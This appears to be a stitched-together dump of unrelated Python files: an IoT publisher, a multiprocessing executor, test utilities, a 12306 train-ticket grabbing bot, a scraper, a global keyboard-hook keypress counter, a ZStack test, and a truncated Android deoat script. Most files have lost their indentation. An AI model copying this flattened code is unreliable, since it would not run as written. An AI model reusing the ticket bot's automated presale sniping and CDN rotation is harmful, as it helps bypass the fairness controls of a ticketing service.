c.setopt(c.SSLCERTTYPE, "PEM")
c.setopt(c.SSLCERT, Cert_Path)
c.setopt(c.CAINFO, CA_Path)
#setting endpoint and HTTPS type, here it is a POST
c.setopt(c.URL, url)
c.setopt(c.POSTFIELDS, post_field)
#Telling Curl to do client and host authentication
c.setopt(c.SSL_VERIFYPEER, 1)
c.setopt(c.SSL_VERIFYHOST, 2)
#Turn on Verbose output and set key as placeholder, not actually a real file.
c.setopt(c.VERBOSE, 0)
c.setopt(c.SSLKEYTYPE, "ENG")
c.setopt(c.SSLKEY, "nonzymkey.key")
c.setopt(c.TIMEOUT, 2)
try:
c.perform()
return 0
except Exception as e:
return -1
# Checking if we can connect to one of Google's IP to check if our internet connection is up
def internet_on():
try:
urllib2.urlopen('http://216.58.192.142', timeout=2)
return True
except urllib2.URLError as err:
return False
except Exception as e:
print(e)
# This thread would check for any data failed to publish from the failQ queue and write it to a log file
def checkFailQueue():
global internetOn
while True:
qSem.acquire()
        if failQ.qsize() > FAIL_THRESHOLD or (internetOn and (failQ.qsize() != 0)):
print('Queue has reached size ' + str(failQ.qsize()))
rwSem.acquire()
with open(log_path, "a") as myfile:
numObjects = 0
while failQ.qsize() > 0:
data = failQ.get()
myfile.write(DATA_SEP + '\n' + data + '\n') # Separate each data object by a characteristic line
numObjects += 1
print('Wrote ' + str(numObjects) + ' items from queue to log')
rwSem.release()
qSem.release()
# This thread will check the log file for any failed events and retry sending them
def retrySend():
global internetOn
while True:
rwSem.acquire()
if internetOn: # Connection is alive
if not os.stat(log_path).st_size == 0: # There is data that needs to reupload
numPublish = 1
with open(log_path) as f:
next(f) # Skip the first DATA_SEP tag
dataBuilder = ''
json_data = ''
for line in f:
line.rstrip() # Strip newline characters
if DATA_SEP not in line:
dataBuilder += line # Build up the JSON payload line by line of file
else:
json_data = dataBuilder # Reached the data separator string so now we store dataBuilder as the json data
print('RETRY ITEM ' + str(numPublish) + ': ' + json_data)
                            if ZK_AWS_Publish(url=AWS_ENDPOINT, post_field=json_data, CA_Path='/home/pi/Zymkey-AWS-Kit/bash_scripts/CA_files/zk_ca.pem', Cert_Path='/home/pi/Zymkey-AWS-Kit/zymkey.crt') != -1:
print('\tRETRY PUBLISH item ' + str(numPublish) + ' from retry\n')
else:
print('Couldnt publish ' + str(numPublish) + ', added to queue')
failQ.put(json_data)
numPublish += 1
dataBuilder = '' # Reset the dataBuilder to empty string
# Print out the very last item in the file
json_data = dataBuilder
print('RETRY ITEM ' + str(numPublish) + ': ' + json_data)
                    if ZK_AWS_Publish(url=AWS_ENDPOINT, post_field=json_data, CA_Path='/home/pi/Zymkey-AWS-Kit/bash_scripts/CA_files/zk_ca.pem', Cert_Path='/home/pi/Zymkey-AWS-Kit/zymkey.crt') != -1:
print('\tRETRY PUBLISH item ' + str(numPublish) + ' from retry\n')
else:
print('Couldnt publish ' + str(numPublish) + ' added to queue')
failQ.put(json_data)
f = open(log_path, 'w+') # Create a new blank log.txt for new logging
f.close()
rwSem.release()
time.sleep(3) # Retrying the publish because isn't too essential to do in quick time
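# Illustrative note (added): retrySend() expects log.txt to hold one JSON
# payload per failed publish, each preceded by the DATA_SEP marker, e.g.
#
#   ---NEW ITEM---
#   {"deviceId": "1", "timestamp": "...", "data": {...}}
#   ---NEW ITEM---
#   {"deviceId": "1", "timestamp": "...", "data": {...}}
#
# The parser skips the first marker and flushes the accumulated lines as one
# JSON object whenever it reaches the next marker, plus once more at EOF.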
failThread = Thread(target = checkFailQueue)
retryThread = Thread(target = retrySend)
failThread.daemon = True
retryThread.daemon = True
internetOn = internet_on()
failThread.start()
retryThread.start()
try:
while True:
# Generate the sample data to try to send
timestamp = datetime.datetime.now()
temp_data = {"tempF": random.randint(70,100), "tempC" : random.randint(35, 50)}
encrypted_data = zymkey.client.lock(bytearray(json.dumps(temp_data)))
signature = zymkey.client.sign(encrypted_data)
data = {"ip": IP, "signature": binascii.hexlify(signature), "encryptedData": binascii.hexlify(encrypted_data), "tempData": temp_data}
post_field = {"deviceId": DEVICE_ID, "timestamp": str(timestamp), "data": data}
json_data = json.dumps(post_field)
if not internet_on():
internetOn = False
qSem.acquire()
print('No connection detected...putting the data into offline storage')
failQ.put(json_data)
qSem.release()
else:
internetOn = True
print('REGULAR PUBLISH item: ' + json_data)
            if ZK_AWS_Publish(url=AWS_ENDPOINT, post_field=json_data, CA_Path='/home/pi/Zymkey-AWS-Kit/bash_scripts/CA_files/zk_ca.pem', Cert_Path='/home/pi/Zymkey-AWS-Kit/zymkey.crt') == -1:
failQ.put(json_data)
print('\tREGULAR PUBLISH: Fail queue size: ' + str(failQ.qsize()) + '\n')
except KeyboardInterrupt:
print('Exiting...')
sys.exit()
|
local_executor.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Local based implementation of the executor using multiprocessing"""
import signal
from multiprocessing import Process, Queue
try:
from queue import Empty
except ImportError:
from Queue import Empty
try:
import psutil
except ImportError:
psutil = None
from . import executor
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
"""kill all child processes recursively"""
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
return
children = parent.children(recursive=True)
for process in children:
try:
process.send_signal(sig)
except psutil.NoSuchProcess:
return
def _execute_func(func, queue, args, kwargs):
"""execute function and return the result or exception to a queue"""
try:
res = func(*args, **kwargs)
except Exception as exc: # pylint: disable=broad-except
res = exc
queue.put(res)
def call_with_timeout(queue, timeout, func, args, kwargs):
"""A wrapper to support timeout of a function call"""
# start a new process for timeout (cannot use thread because we have c function)
p = Process(target=_execute_func, args=(func, queue, args, kwargs))
p.start()
p.join(timeout=timeout)
queue.put(executor.TimeoutError())
kill_child_processes(p.pid)
p.terminate()
p.join()
class LocalFuture(executor.Future):
"""Local wrapper for the future
Parameters
----------
process: multiprocessing.Process
process for running this task
queue: multiprocessing.Queue
queue for receiving the result of this task
"""
def __init__(self, process, queue):
self._done = False
self._process = process
self._queue = queue
def done(self):
self._done = self._done or not self._queue.empty()
return self._done
def get(self, timeout=None):
try:
res = self._queue.get(block=True, timeout=timeout)
except Empty:
raise executor.TimeoutError()
if self._process.is_alive():
kill_child_processes(self._process.pid)
self._process.terminate()
self._process.join()
self._queue.close()
self._queue.join_thread()
self._done = True
del self._queue
del self._process
return res
class LocalFutureNoFork(executor.Future):
"""Local wrapper for the future.
This is a none-fork version of LocalFuture.
Use this for the runtime that does not support fork (like cudnn)
"""
def __init__(self, result):
self._result = result
def done(self):
return True
def get(self, timeout=None):
return self._result
class LocalExecutor(executor.Executor):
"""Local executor that runs workers on the same machine with multiprocessing.
Parameters
----------
timeout: float, optional
timeout of a job. If time is out. A TimeoutError will be returned (not raised)
do_fork: bool, optional
For some runtime systems that do not support fork after initialization
(e.g. cuda runtime, cudnn). Set this to False if you have used these runtime
before submitting jobs.
"""
def __init__(self, timeout=None, do_fork=True):
self.timeout = timeout or executor.Executor.DEFAULT_TIMEOUT
self.do_fork = do_fork
if self.do_fork:
if not psutil:
raise RuntimeError("Python package psutil is missing. "
"please try `pip install psutil`")
def submit(self, func, *args, **kwargs):
if not self.do_fork:
return LocalFutureNoFork(func(*args, **kwargs))
queue = Queue(2) # Size of 2 to avoid a race condition with size 1.
process = Process(target=call_with_timeout,
args=(queue, self.timeout, func, args, kwargs))
process.start()
return LocalFuture(process, queue)
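# Usage sketch (added for illustration; `double` is a hypothetical function):
#
#   local_executor = LocalExecutor(timeout=10)
#   future = local_executor.submit(double, 21)   # runs double(21) in a subprocess
#   result = future.get(timeout=15)              # 42, or a TimeoutError instance
#
# Note that a timed-out job is *returned* as executor.TimeoutError rather than
# raised, as described in the LocalExecutor docstring above.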
|
utils.py
|
import os
import threading
import warnings
from wsgiref.simple_server import make_server, WSGIRequestHandler
from wsgiref.util import shift_path_info
import requests
warnings.filterwarnings(action='ignore', category=DeprecationWarning,
module='requests')
TEST_FILE_PATH = os.path.join(os.path.dirname(__file__), 'test_files')
class SilentWSGIHandler(WSGIRequestHandler):
def log_message(*args):
pass
class TestServer(object):
"""
Wraps a WSGI application and allows you to make real HTTP
requests against it
"""
PREFIX = 'subdir'
def __init__(self, application):
self.application = application
self.server = make_server('127.0.0.1', 0, self.serve_under_prefix,
handler_class=SilentWSGIHandler)
def serve_under_prefix(self, environ, start_response):
prefix = shift_path_info(environ)
if prefix != self.PREFIX:
start_response('404 Not Found', [])
return []
else:
return self.application(environ, start_response)
def get(self, *args, **kwargs):
return self.request('get', *args, **kwargs)
def request(self, method, path, *args, **kwargs):
url = u'http://{0[0]}:{0[1]}{1}'.format(self.server.server_address, path)
thread = threading.Thread(target=self.server.handle_request)
thread.start()
response = requests.request(method, url, *args, **kwargs)
thread.join()
return response
class Files(object):
def __init__(self, directory, **files):
self.directory = os.path.join(TEST_FILE_PATH, directory)
for name, path in files.items():
url = u'/{}/{}' .format(TestServer.PREFIX, path)
with open(os.path.join(self.directory, path), 'rb') as f:
content = f.read()
setattr(self, name + '_path', path)
setattr(self, name + '_url', url)
setattr(self, name + '_content', content)
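# Usage sketch (added for illustration): `hello_app` is a hypothetical WSGI app
# showing how TestServer serves it under the '/subdir' prefix over real HTTP.
if __name__ == "__main__":
    def hello_app(environ, start_response):
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return [b'hello']

    server = TestServer(hello_app)
    response = server.get('/' + TestServer.PREFIX + '/anything')
    print(response.status_code, response.text)  # expected: 200 hello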
|
select_ticket_info.py
|
# -*- coding=utf-8 -*-
import datetime
import random
import os
import socket
import sys
import threading
import time
import TickerConfig
import wrapcache
from agency.cdn_utils import CDNProxy
from config import urlConf, configCommon
from config.TicketEnmu import ticket
from config.configCommon import seat_conf_2, seat_conf
from config.getCookie import getDrvicesID
from init.login import GoLogin
from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest
from inter.ChechFace import chechFace
from inter.CheckUser import checkUser
from inter.GetPassengerDTOs import getPassengerDTOs
from inter.LiftTicketInit import liftTicketInit
from inter.Query import query
from inter.SubmitOrderRequest import submitOrderRequest
from myException.PassengerUserException import PassengerUserException
from myException.UserPasswordException import UserPasswordException
from myException.ticketConfigException import ticketConfigException
from myException.ticketIsExitsException import ticketIsExitsException
from myException.ticketNumOutException import ticketNumOutException
from myUrllib.httpUtils import HTTPClient
class select:
"""
    Fast ticket-submission channel
"""
def __init__(self):
self.get_ticket_info()
self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE]
self.auto_code_type = 2
self.httpClint = HTTPClient(TickerConfig.IS_PROXY)
self.urls = urlConf.urls
self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type)
self.cdn_list = []
self.queryUrl = "leftTicket/queryT"
self.passengerTicketStrList = ""
self.passengerTicketStrByAfterLate = ""
self.oldPassengerStr = ""
self.set_type = ""
@staticmethod
def get_ticket_info():
"""
        Get configuration information
:return:
"""
print(u"*" * 50)
print(u"检查当前python版本为:{},目前版本只支持3.6以上".format(sys.version.split(" ")[0]))
print(u"12306刷票小助手,最后更新于2019.01.08,请勿作为商业用途,交流群号:286271084(已满),"
u" 2群:649992274(已满)\n"
u" 3群:632501142(已满)\n"
u" 4群: 606340519(已满)\n"
u" 5群: 948526733(已满)\n"
u" 6群: 444101020(未满)\n"
u" 7群: 660689659(未满)\n"
)
        print(
            f"Current configuration:\nFrom station: {TickerConfig.FROM_STATION}\nTo station: {TickerConfig.TO_STATION}\nTravel dates: {','.join(TickerConfig.STATION_DATES)}\nSeat types: {','.join(TickerConfig.SET_TYPE)}\nSubmit any available ticket first: {TickerConfig.IS_MORE_TICKET}\nPassengers: {TickerConfig.TICKET_PEOPLES}\n" \
            f"Refresh interval: random (1-3s)\nStale-ticket blacklist duration: {TickerConfig.TICKET_BLACK_LIST_TIME}\nOrder API: {TickerConfig.ORDER_TYPE}\nOrder mode: {TickerConfig.ORDER_MODEL}\nPresale start time: {TickerConfig.OPEN_TIME}")
print(u"*" * 50)
def station_table(self, from_station, to_station):
"""
        Read station information
        :param from_station:
        :param to_station:
:return:
"""
path = os.path.join(os.path.dirname(__file__), '../station_name.txt')
try:
with open(path, encoding="utf-8") as result:
info = result.read().split('=')[1].strip("'").split('@')
except Exception:
with open(path) as result:
info = result.read().split('=')[1].strip("'").split('@')
del info[0]
station_name = {}
for i in range(0, len(info)):
n_info = info[i].split('|')
station_name[n_info[1]] = n_info[2]
try:
from_station = station_name[from_station.encode("utf8")]
to_station = station_name[to_station.encode("utf8")]
except KeyError:
from_station = station_name[from_station]
to_station = station_name[to_station]
return from_station, to_station
def call_login(self, auth=False):
"""
登录回调方法
:return:
"""
if auth:
return self.login.auth()
else:
            configCommon.checkSleepTime(self)  # sleep at night once the cutoff time is reached (for online starts)
self.login.go_login()
def cdn_req(self, cdn):
for i in range(len(cdn) - 1):
http = HTTPClient(0)
urls = self.urls["loginInitCdn"]
http._cdn = cdn[i].replace("\n", "")
start_time = datetime.datetime.now()
rep = http.send(urls)
if rep and "message" not in rep and (datetime.datetime.now() - start_time).microseconds / 1000 < 500:
if cdn[i].replace("\n", "") not in self.cdn_list: # 如果有重复的cdn,则放弃加入
# print(u"加入cdn {0}".format(cdn[i].replace("\n", "")))
self.cdn_list.append(cdn[i].replace("\n", ""))
print(u"所有cdn解析完成...")
def cdn_certification(self):
"""
cdn 认证
:return:
"""
if TickerConfig.IS_CDN == 1:
CDN = CDNProxy()
all_cdn = CDN.open_cdn_file()
if all_cdn:
# print(u"由于12306网站策略调整,cdn功能暂时关闭。")
print(u"开启cdn查询")
print(u"本次待筛选cdn总数为{}, 筛选时间大约为5-10min".format(len(all_cdn)))
t = threading.Thread(target=self.cdn_req, args=(all_cdn,))
t.setDaemon(True)
# t2 = threading.Thread(target=self.set_cdn, args=())
t.start()
# t2.start()
else:
raise ticketConfigException(u"cdn列表为空,请先加载cdn")
def main(self):
self.cdn_certification()
l = liftTicketInit(self)
l.reqLiftTicketInit()
getDrvicesID(self)
self.call_login()
check_user = checkUser(self)
t = threading.Thread(target=check_user.sendCheckUser)
t.setDaemon(True)
t.start()
from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION)
num = 0
s = getPassengerDTOs(session=self, ticket_peoples=TickerConfig.TICKET_PEOPLES)
passenger = s.sendGetPassengerDTOs()
wrapcache.set("user_info", passenger, timeout=9999999)
while 1:
try:
num += 1
                now = datetime.datetime.now()  # thanks to a group member for the on-the-hour timing code
                configCommon.checkSleepTime(self)  # sleep at night once the cutoff time is reached
                if TickerConfig.ORDER_MODEL == 1:
sleep_time_s = 0.5
sleep_time_t = 0.6
                    # tested: only microsecond-level error, should not matter; sample result 2019-01-02 22:30:00.004555. Presale timing is still affected by the previous refresh; no better fix yet
while not now.strftime("%H:%M:%S") == TickerConfig.OPEN_TIME:
now = datetime.datetime.now()
if now.strftime("%H:%M:%S") > TickerConfig.OPEN_TIME:
break
time.sleep(0.0001)
else:
sleep_time_s = 0.5
sleep_time_t = 3
q = query(session=self,
from_station=from_station,
to_station=to_station,
from_station_h=TickerConfig.FROM_STATION,
to_station_h=TickerConfig.TO_STATION,
_station_seat=self._station_seat,
station_trains=TickerConfig.STATION_TRAINS,
station_dates=TickerConfig.STATION_DATES,
ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES),
)
queryResult = q.sendQuery()
                # query API
if queryResult.get("status", False):
train_no = queryResult.get("train_no", "")
train_date = queryResult.get("train_date", "")
stationTrainCode = queryResult.get("stationTrainCode", "")
secretStr = queryResult.get("secretStr", "")
seat = queryResult.get("seat", "")
leftTicket = queryResult.get("leftTicket", "")
query_from_station_name = queryResult.get("query_from_station_name", "")
query_to_station_name = queryResult.get("query_to_station_name", "")
is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES))
if wrapcache.get(train_no):
print(ticket.QUEUE_WARNING_MSG.format(train_no))
else:
                        # fetch passenger contacts
s = getPassengerDTOs(session=self, ticket_peoples=TickerConfig.TICKET_PEOPLES,
set_type="" if isinstance(seat, list) else seat_conf_2[seat],
# 候补订单需要设置多个坐席
is_more_ticket_num=is_more_ticket_num)
getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr()
if getPassengerDTOsResult.get("status", False):
self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "")
self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get(
"passengerTicketStrByAfterLate", "")
self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "")
self.set_type = getPassengerDTOsResult.get("set_type", "")
                            # submit the order
                            # two kinds of orders: normal grab orders and waitlist (houbu) orders
                            if TickerConfig.TICKET_TYPE == 1:
                                if TickerConfig.ORDER_TYPE == 1:  # fast one-step order
a = autoSubmitOrderRequest(session=self,
secretStr=secretStr,
train_date=train_date,
passengerTicketStr=self.passengerTicketStrList,
oldPassengerStr=self.oldPassengerStr,
train_no=train_no,
stationTrainCode=stationTrainCode,
leftTicket=leftTicket,
set_type=self.set_type,
query_from_station_name=query_from_station_name,
query_to_station_name=query_to_station_name,
)
a.sendAutoSubmitOrderRequest()
                                elif TickerConfig.ORDER_TYPE == 2:  # normal two-step order
sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no,
self.set_type,
self.passengerTicketStrList, self.oldPassengerStr, train_date,
TickerConfig.TICKET_PEOPLES)
sor.sendSubmitOrderRequest()
elif TickerConfig.TICKET_TYPE == 2:
c = chechFace(self, secretStr)
c.sendChechFace()
else:
random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2)
print(u"正在第{0}次查询 随机停留时长:{6} 乘车日期: {1} 车次:{2} 查询无票 cdn轮询IP:{4}当前cdn总数:{5} 总耗时:{3}ms".format(num,
",".join(
TickerConfig.STATION_DATES),
",".join(
TickerConfig.STATION_TRAINS),
(
datetime.datetime.now() - now).microseconds / 1000,
queryResult.get(
"cdn",
None),
len(
self.cdn_list),
random_time))
time.sleep(random_time)
except PassengerUserException as e:
print(e)
break
except ticketConfigException as e:
print(e)
break
except ticketIsExitsException as e:
print(e)
break
except ticketNumOutException as e:
print(e)
break
except UserPasswordException as e:
print(e)
break
except ValueError as e:
if e == "No JSON object could be decoded":
print(u"12306接口无响应,正在重试")
else:
print(e)
except KeyError as e:
print(e)
except TypeError as e:
print(u"12306接口无响应,正在重试 {0}".format(e))
except socket.error as e:
print(e)
if __name__ == '__main__':
s = select()
cdn = s.station_table("长沙", "深圳")
|
getSearchResult.py
|
# -*- coding: UTF-8 -*-
from HTMLParser import HTMLParser
import re
import urllib,urllib2,cookielib
import threading,time
import publicParams as P
import reHTMLTags as rH
class getSearchResult(HTMLParser):
def __init__(self,addr):
HTMLParser.__init__(self)
self.data={}
self.lstr=None
self.a_text = None
self.addr=addr
def handle_starttag(self, tag, attr):
if tag == "a":
if len(attr) == 0:
pass
else:
for (variable, value) in attr:
self.a_text = True
if variable == "href":
self.lstr=value
def handle_endtag(self, tag):
if tag == 'a':
self.a_text = None
def handle_data(self, data):
#P.list_time.append("1.1"+str(time.ctime()))
if self.a_text:
re_s =re.search( P.key, data, re.M|re.I|re.U)
if re_s:
ts=self.lstr.split('/')[0]
if len(ts) > 0 :
self.lstr=self.lstr
else :
self.lstr=self.addr+self.lstr
#P.list_time.append("1.2"+str(time.ctime()))
if P.list_links.count(self.lstr)==0:
P.list_links.append(self.lstr)
P.list_titles.append(data)
#P.list_time.append("1.3"+str(time.ctime()))
h=getChtml(self.lstr)
#P.list_time.append("1.4"+str(time.ctime()))
if h:
h=rH.getString(h)
sc=rH.getCount(h,P.key)
if sc == 0:
pass
else:
self.data['weight']=sc
self.data['title']=data.encode('utf-8')
self.data['link']=self.lstr.encode('utf-8')
P.list_data.append(self.data)
else:
pass
#t = threading.Thread(target=self.thr)
#t.start()
#P.list_time.append("1.5"+str(time.ctime()))
self.data={}
def getChtml(url):
content=None
req=urllib2.Request(url)
if req:
res=urllib2.urlopen(req)
content=res.read()
else:
pass
return content
|
keyboard.py
|
import pyHook
import pythoncom
from multiprocessing import Process, Value
# This function is run in its own process to allow it to gather keypresses
def log_key_count(val):
def OnKeyboardEvent(event):
val.value += 1
return True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
class StreamGatherer():
streamname = "keypresses"
streamschema = {"type": "integer"}
description = "Gathers the number of keystrokes made on the keyboard"
datatype = "action.count"
icon = "material:keyboard"
def __init__(self):
self.keypress_number = Value('i', 0)
self.keylogger_process = None
def start(self, cache):
# Starts the background processes and stuff. The cache is passed, so that
# if the gatherer catches events, they can be logged as they come in
if self.keylogger_process is None:
self.keylogger_process = Process(
target=log_key_count, args=(self.keypress_number,))
self.keylogger_process.daemon = True
self.keylogger_process.start()
def stop(self):
if self.keylogger_process is not None:
self.keylogger_process.terminate()
self.keylogger_process = None
self.keypress_number.value = 0
def run(self, cache):
kp = self.keypresses()
if kp > 0:
cache.insert(self.streamname, kp)
# Gets the number of keypresses that are logged, and reset the counter
def keypresses(self):
v = self.keypress_number.value
self.keypress_number.value = 0
return v
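# Usage sketch (added for illustration): `DummyCache` is a stand-in for the
# cache object that run() expects; it simply prints whatever gets inserted.
if __name__ == "__main__":
    import time

    class DummyCache(object):
        def insert(self, stream, value):
            print("%s %s" % (stream, value))

    gatherer = StreamGatherer()
    gatherer.start(None)        # the cache argument is unused by start()
    time.sleep(5)               # type a few keys during this window
    gatherer.run(DummyCache())  # inserts the keypress count, if any
    gatherer.stop()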
|
test_crt_temp_image_progress2.py
|
'''
Test Progress of Create Image Template from Root Volume
@author: quarkonics
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.zstack_test.zstack_test_image as test_image
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm
import zstackwoodpecker.operations.config_operations as conf_ops
import zstackwoodpecker.operations.resource_operations as res_ops
import os
import time
import threading
import tempfile
import uuid
_config_ = {
'timeout' : 1800,
'noparallel' : False
}
test_stub = test_lib.lib_get_test_stub()
#test_obj_dict is to track test resource. They will be cleanup if there will be any exception in testing.
test_obj_dict = test_state.TestStateDict()
origin_interval = None
bs_type = None
threads_num = 1
vms = [None] * threads_num
images = [None] * threads_num
image_jobs = [None] * threads_num
threads = [None] * threads_num
checker_threads = [None] * threads_num
checker_results = [None] * threads_num
def create_temp_image(index):
global vms
global images
image_creation_option = test_util.ImageOption()
backup_storage_list = test_lib.lib_get_backup_storage_list_by_vm(vms[index].vm)
image_creation_option.set_backup_storage_uuid_list([backup_storage_list[0].uuid])
image_creation_option.set_root_volume_uuid(vms[index].vm.rootVolumeUuid)
image_creation_option.set_name('test_create_image_template_progress%s' % (index))
bs_type = backup_storage_list[0].type
if bs_type == 'Ceph':
origin_interval = conf_ops.change_global_config('ceph', 'imageCache.cleanup.interval', '1')
images[index] = test_image.ZstackTestImage()
images[index].set_creation_option(image_creation_option)
image_jobs[index] = str(uuid.uuid4()).replace('-', '')
images[index].create(image_jobs[index])
test_obj_dict.add_image(images[index])
def check_create_temp_image_progress(index):
global images
for i in range(0, 100):
time.sleep(0.1)
image_cond = res_ops.gen_query_conditions("status", '=', "Creating")
image_cond = res_ops.gen_query_conditions("name", '=', "test_create_image_template_progress%s" % (index), image_cond)
image_query = res_ops.query_resource_fields(res_ops.IMAGE, image_cond, \
None, fields=['uuid'])
if len(image_query) > 0:
break
if len(image_query) <= 0:
test_util.test_fail("image is not in creating after 10 seconds")
for i in range(0, 100):
progress = res_ops.get_task_progress(image_jobs[index]).inventories[0]
if progress.content != None:
break
else:
test_util.test_logger('task progress still not ready')
time.sleep(0.1)
if int(progress.content) < 0 or int(progress.content) > 100:
test_util.test_fail("Progress of task should be between 0 and 100, while it actually is %s" % (progress.content))
for i in range(0, 3600):
last_progress = progress
progress = res_ops.get_task_progress(image_jobs[index]).inventories[0]
if progress.content == None:
break
if int(progress.content) < int(last_progress.content):
test_util.test_fail("Progress (%s) of task is smaller than last time (%s)" % (progress.content, last_progress.content))
image_cond = res_ops.gen_query_conditions("uuid", '=', image_query[0].uuid)
image_query2 = res_ops.query_resource_fields(res_ops.IMAGE, image_cond, \
None, fields=['status'])
if image_query2[0].status != "Ready":
test_util.test_fail("Image should be ready when no progress anymore")
checker_results[index] = 'pass'
def test():
global vms
global images
global threads
global checker_threads
global origin_interval
global bs_type
test_util.test_dsc('Create test vm and check')
script_file = tempfile.NamedTemporaryFile(delete=False)
script_file.write('dd if=/dev/zero of=/home/dd bs=1M count=100')
script_file.close()
for i in range(0, threads_num):
vms[i] = test_stub.create_vlan_vm()
vms[i].check()
backup_storage_list = test_lib.lib_get_backup_storage_list_by_vm(vms[i].vm)
if backup_storage_list[0].type != 'ImageStoreBackupStorage':
test_util.test_skip("Requires imagestore BS to test, skip testing")
if not test_lib.lib_execute_shell_script_in_vm(vms[i].get_vm(), script_file.name):
test_util.test_fail("fail to create data in [vm:] %s" % (vms[i].get_vm().uuid))
test_obj_dict.add_vm(vms[i])
vms[i].stop()
os.unlink(script_file.name)
for i in range(0, threads_num):
threads[i] = threading.Thread(target=create_temp_image, args=(i, ))
threads[i].start()
for i in range(0, threads_num):
checker_threads[i] = threading.Thread(target=check_create_temp_image_progress, args=(i, ))
checker_threads[i].start()
for i in range(0, threads_num):
checker_threads[i].join()
threads[i].join()
images[i].check()
vms[i].destroy()
images[i].delete()
for i in range(0, threads_num):
if checker_results[i] == None:
test_util.test_fail("Image checker thread %s fail" % (i))
if bs_type == 'Ceph':
time.sleep(60)
if bs_type == 'Ceph':
conf_ops.change_global_config('ceph', 'imageCache.cleanup.interval', origin_interval)
test_util.test_pass('Create Image Template Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global test_obj_dict
global origin_interval
global bs_type
if bs_type == 'Ceph':
conf_ops.change_global_config('ceph', 'imageCache.cleanup.interval', origin_interval)
test_lib.lib_error_cleanup(test_obj_dict)
|
deoat.py
|
#!/usr/bin/python
# Copyright 2015 Coron
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Convert the OAT format on ART to DEX format on DALVIKVM.
Usage: deoat.py [OPTIONS] <otapackage.zip> [<otapackage.deoat.zip>]
OPTIONS:
--app, -a: only de-oat the apk in system.
--framework, -f: only de-oat the jar in system.
"""
# Refer to the SuperR's Kitchen for the deodex Lollipop ROMs
__author__ = 'duanqz@gmail.com'
import os
import commands
import re
import shutil
import threading
from common import Utils, Log
# Global
TAG="reverse-deoat"
OPTIONS = None
class OatZip:
""" Model of OAT ZIP file
"""
OAT2DEX = os.path.join(os.path.dirname(__file__), "de-oat", "oat2dex.sh")
def __init__(self, unzipRoot):
self.mRoot = unzipRoot
self.mFrwDir = os.path.join(self.mRoot, "system/framework")
self.mAppDir = os.path.join(self.mRoot, "system/app")
self.mPrivAppDir = os.path.join(self.mRoot, "system/priv-app")
self.mAllAppDirList = [self.mFrwDir, self.mAppDir, self.mPrivAppDir]
self.mSystemDir = os.path.join(self.mRoot, "system")
self.findArch()
self.mBootOAT = os.path.join(self.mFrwDir, self.arch, "boot.oat")
if os.path.exists(self.mBootOAT):
Log.i(TAG, "mBootOAT : " + self.mBootOAT)
else:
self.mBootOAT = None
Log.i(TAG, "boot.oat not found!")
@staticmethod
def testArch(frwDir, arch):
""" Test whether arch exists
"""
bootOATPath = os.path.join(frwDir, arch, "boot.oat")
Log.i(TAG, "testArch : " + bootOATPath)
if os.path.exists(bootOATPath):
return True
return False
def findArch(self):
""" Find arch and arch2
"""
self.arch = ""
self.arch2 = ""
if OatZip.testArch(self.mFrwDir, "arm64"):
self.arch = "arm64"
if OatZip.testArch(self.mFrwDir, "arm"):
self.arch2 = "arm"
elif OatZip.testArch(self.mFrwDir, "x86_64"):
self.arch = "x86_64"
if OatZip.testArch(self.mFrwDir, "x86"):
self.arch2="x86"
elif OatZip.testArch(self.mFrwDir, "arm"):
self.arch = "arm"
elif OatZip.testArch(self.mFrwDir, "x86"):
self.arch = "x86"
else:
Log.d(TAG, "unknow arch")
def findBootOAT(self):
""" Find the absolute path of boot.oat
In Android 5.0+, all the jars of BOOTCLASSPATH are packaged into boot.oat
"""
bootOATPath = os.path.join(self.mFrwDir, "arm64/boot.oat")
if os.path.exists(bootOATPath):
return bootOATPath
bootOATPath = os.path.join(self.mFrwDir, "arm/boot.oat")
if os.path.exists(bootOATPath):
return bootOATPath
bootOATPath = os.path.join(self.mFrwDir, "x86_64/boot.oat")
if os.path.exists(bootOATPath):
return bootOATPath
bootOATPath = os.path.join(self.mFrwDir, "x86/boot.oat")
if os.path.exists(bootOATPath):
return bootOATPath
bootOATPath = None
cmd = "find %s -name boot.oat" % (commands.mkarg(self.mFrwDir))
(sts, text) = commands.getstatusoutput(cmd)
try:
if sts == 0:
text = text.split("\n")[0]
if len(text) > 0:
return text
except:
bootOATPath = None
return bootOATPath
def deoat(self):
""" De-oat the OTA package.
"""
if self.mBootOAT == None:
